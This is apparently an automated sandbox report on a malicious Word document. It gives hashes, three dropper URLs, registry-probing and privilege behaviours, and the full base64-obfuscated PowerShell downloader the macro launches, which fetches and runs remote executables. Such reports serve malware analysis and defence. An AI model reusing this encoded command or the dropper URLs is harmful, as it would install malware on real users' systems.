d8101b2e4f835e485af2454cbf4c1a3cb347cbf77f065932d350af4cbac136a1

General

Target

d8101b2e4f835e485af2454cbf4c1a3cb347cbf77f065932d350af4cbac136a1.doc
Size

162KB
MD5

ec469b83d15d1579617a3e9b6598c062
SHA1

f648aa6fe1134cf1616e83ab953150f2e810952d
SHA256

d8101b2e4f835e485af2454cbf4c1a3cb347cbf77f065932d350af4cbac136a1
SHA512

8ac5c94344d9fb0f9fc0ceed5e2937c0c7711452a4b3dc76f363df99d08b008c3cf6295d11120e585e319d7bf61f58732653f523abde39a77a9b82c140639a32

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://chistyshifaclinic.com/administrator/modules/mod_multilangstatus/language/verizon-bill-1.content.exe

exe.dropper

http://jaydeemory.com/administrator/components/com_privacy/controllers/verizon-bill-2.content.exe

exe.dropper

http://80.211.250.213:8080/es478oVMLwLrqZLe8x90y3c5

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	828	1652	PoWeRsHelL.exe	37

Blocklisted process makes network request 4 IoCs

flow	pid	Process
26	828	PoWeRsHelL.exe
43	828	PoWeRsHelL.exe
58	828	PoWeRsHelL.exe
67	828	PoWeRsHelL.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2432	WINWORD.EXE
2432	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
828	PoWeRsHelL.exe
828	PoWeRsHelL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	828	PoWeRsHelL.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2432	WINWORD.EXE
2432	WINWORD.EXE
2432	WINWORD.EXE
2432	WINWORD.EXE
2432	WINWORD.EXE
2432	WINWORD.EXE
2432	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d8101b2e4f835e485af2454cbf4c1a3cb347cbf77f065932d350af4cbac136a1.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2432

C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe
PoWeRsHelL -e JABhAGsAUQB4AEEAXwB4AD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBMAEEAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAEQAXwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBCACcALAAnAFoAbwBRACcAKQApACkAOwAkAFkAQgBBAEEAMQAxAFUAIAA9ACAAJwA0ADUANAAnADsAJABDAEEARABfAEIAQwBEAD0AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBIAEEAXwAnACwAJwBfACcALAAnAEEAbwBVACcAKQA7ACQARwBBAGMAQQBHAHgAMQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWQBCAEEAQQAxADEAVQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAZQB4AGUAJwAsACcALgAnACkAOwAkAEwAWgBBAEEAQQBBAD0AKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGYAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBBAFUAQQAnACwAJwBBACcAKQAsACcAQgAnACkAKQA7ACQASgBrAFEANAB3AFEAQQBRAD0ALgAoACcAbgBlAHcALQAnACsAJwBvAGIAagBlACcAKwAnAGMAdAAnACkAIABuAGUAYABUAGAALgB3AEUAYABCAGMAbABpAGUATgB0ADsAJABYAHcAVQBBAEEAdwBEAD0AKAAiAHsAMwB9AHsAMgA3AH0AewAxADEAfQB7ADAAfQB7ADEAMwB9AHsAMwA3AH0AewAzADIAfQB7ADQAfQB7ADMAOQB9AHsAMwA1AH0AewAyADQAfQB7ADMAOAB9AHsAMgAxAH0AewAxADgAfQB7ADIANQB9AHsAMQAwAH0AewAzADAAfQB7ADYAfQB7ADIAfQB7ADEAOQB9AHsAMgA5AH0AewAyADYAfQB7ADIAMwB9AHsAMwAxAH0AewA4AH0AewAxADUAfQB7ADEANAB9AHsANAAxAH0AewAzADMAfQB7ADQAMAB9AHsAMgAyAH0AewA1AH0AewAzADQAfQB7ADEANwB9AHsAMQAyAH0AewAyADgAfQB7ADEAfQB7ADMANgB9AHsAOQB9AHsANwB9AHsAMQA2AH0AewAyADAAfQAiAC0AZgAnAGwAJwAsACcALgAyADEAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC8AJwAsACcAdABwADoAJwApACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACcAaAB0ACcALAAnAHQAcAA6ACcAKQAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAbwBkACcALAAnAHUAbAAnACkALAAnAC8AbQAnACwAJwB0AG8AcgAnACkALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGkAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAG8AbgAtACcALAAnAHoAJwApACkALAAnAGgAdAAnACwAKAAiAHsAMAB9AHsANgB9AHsAMQB9AHsAMwB9AHsANQB9AHsAMgB9AHsANAB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAOAAnACwAJwA6ADgAMAAnACkALAAnAHMANAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAdwAnACwAJwBMAHIAcQBaAEwAZQA4ACcAKQAsACcANwA4ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnADkAMAB5ACcALAAnAHgAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAFYATQAnACwAJwBMACcAKQAsACcAMAAvAGUAJwApACwAJwByAGEAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcANQAnACwAJwAxADMAJwAsACcAMAAuADIAJwApACwAJwB0AC4AZQAnACwAJwBmAGEAYwAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAHgAZQBAACcALAAnAGgAJwApACwAJwBlACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG4AdAAuACcALAAnAHQAZQAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAaQBuAGkAJwAsACcAYwAnACkALAAoACIAewAyAH0AewA0AH0AewAxAH0AewAwAH0AewAzAH0AIgAtAGYAJwByAGkAdgAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBvAG0AJwAsACcAXwBwACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAG4AZQBuACcALAAnAG8AJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcALwBjAG8AbgB0AHIAJwAsACcAYQBjAHkAJwApACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAcwAvAGMAJwAsACcAdAAnACkAKQAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAnAHAAJwAsACcAYwBvAG0AJwApACwAJwBvAHIALwAnACkALAAnADMAJwAsACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAC4AYwBvACcALAAnAC0AMgAnACwAJwBuACcAKQAsACcAdAAnACwAJwBqACcALAAnAGMANQAnACwAKAAiAHsAMQB9AHsAMAB9AHsAMwB9AHsAMgB9ACIALQBmACAAJwBsACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBpAGwAJwAsACcALQBiACcAKQAsACcAbwBuACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwAxAC4AYwAnACwAJwAtACcAKQApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwAvAHYAJwAsACcAZQByACcAKQAsACcAcgB5AC4AJwAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAC8AbAAnACwAJwBhAG4AJwAsACcAZwB1ACcAKQAsACcAZQBuACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBlACcALAAnAGUAbQBvACcAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACcALwAnACwAJwAvAGMAaAAnACwAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHMAaABpACcALAAnAHQAeQAnACwAJwBpAHMAJwApACkALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAJwBwADoALwAnACwAJwB0AHQAJwAsACcALwA4ADAAJwApACwAJwBhAHkAZAAnACwAJwB4AGUAQAAnACwAKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAYwAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwBvAG0ALwAnACwAJwBkAG0AaQBuACcALAAnAGEAJwApACwAJwBpAHMAdAAnACkALAAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBzAHQAcgAnACwAJwBtAGkAbgBpACcAKQAsACcAYQAnACwAJwBkACcAKQAsACcAbAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAaQBsAGwAJwAsACcAYgAnACkALAAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAGEAbgAnACwAJwB1AHMAJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHMAdABhAHQAJwAsACcAZwAnACkAKQAsACcAMQAuADIAJwAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcALwBhACcALAAnAG0AJwAsACcALgBjAG8AJwApACwAKAAiAHsAMwB9AHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAJwBuACcALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAegBvACcALAAnAHIAaQAnACkALAAnAC8AdgBlACcALAAnAGEAZwBlACcAKQAsACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiAC0AZgAnAHQAaQAnACwAJwBtAHUAbAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBlAHMALwBtAG8AZAAnACwAJwBfACcAKQAsACcAbAAnACkALAAnAGUAcgBzACcALAAnAG8AbAAnACkALgAiAHMAYABQAGwASQB0ACIAKAAnAEAAJwApADsAJABWAFgAUQBBAFgAbwA9ACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiACAALQBmACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBEACcALAAnAEEAYwBBACcAKQAsACcAbwA0AEIAJwAsACcAXwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABBAEEAQQBBAEIAawBBAHcAIABpAG4AIAAkAFgAdwBVAEEAQQB3AEQAKQB7AHQAcgB5AHsAJABKAGsAUQA0AHcAUQBBAFEALgAiAGQAbwB3AGAATgBsAGAAbwBhAEQAZgBJAGwAZQAiACgAJABBAEEAQQBBAEIAawBBAHcALAAgACQARwBBAGMAQQBHAHgAMQApADsAJABMAEMAQwBBAEEAMQA0AD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBRACcALAAnAG4AJwAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAUQAnACwAJwBDAEEAJwApACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtAEkAdAAnACsAJwBlAG0AJwApACAAJABHAEEAYwBBAEcAeAAxACkALgAiAEwARQBgAE4AYABHAHQASAAiACAALQBnAGUAIAAyADkAMwA1ADAAKQAgAHsALgAoACcASQBuACcAKwAnAHYAbwBrAGUALQAnACsAJwBJAHQAZQBtACcAKQAgACQARwBBAGMAQQBHAHgAMQA7ACQAUgBBAEQAawBVAF8ARwBfAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIAIAAtAGYAIAAnAGoAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAQQBBADQAJwAsACcAWgBBACcAKQAsACcAYwBBACcAKQA7AGIAcgBlAGEAawA7ACQAWgBVAFUAUQA0AEEAPQAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBaADEAJwAsACcARAAnACwAJwBvAEEAQQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHQAQQB3AEEAVQBBAFgAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAnAEEAQgAnACwAJwBOAFoARwAnACwAJwBBAFgAQgAnACkA
1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:828

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/828-138-0x000002631DCB0000-0x000002631DCD2000-memory.dmp

Filesize
136KB

Download
memory/828-141-0x00007FFCA4250000-0x00007FFCA4D11000-memory.dmp

Filesize
10.8MB

Download
memory/828-140-0x00007FFCA4250000-0x00007FFCA4D11000-memory.dmp

Filesize
10.8MB

Download
memory/828-139-0x00007FFCA4250000-0x00007FFCA4D11000-memory.dmp

Filesize
10.8MB

Download
memory/2432-134-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-135-0x00007FFC8D0F0000-0x00007FFC8D100000-memory.dmp

Filesize
64KB

Download
memory/2432-136-0x00007FFC8D0F0000-0x00007FFC8D100000-memory.dmp

Filesize
64KB

Download
memory/2432-137-0x0000021CDB860000-0x0000021CDB864000-memory.dmp

Filesize
16KB

Download
memory/2432-133-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-130-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-131-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-132-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-143-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-144-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-146-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download
memory/2432-145-0x00007FFC8F810000-0x00007FFC8F820000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads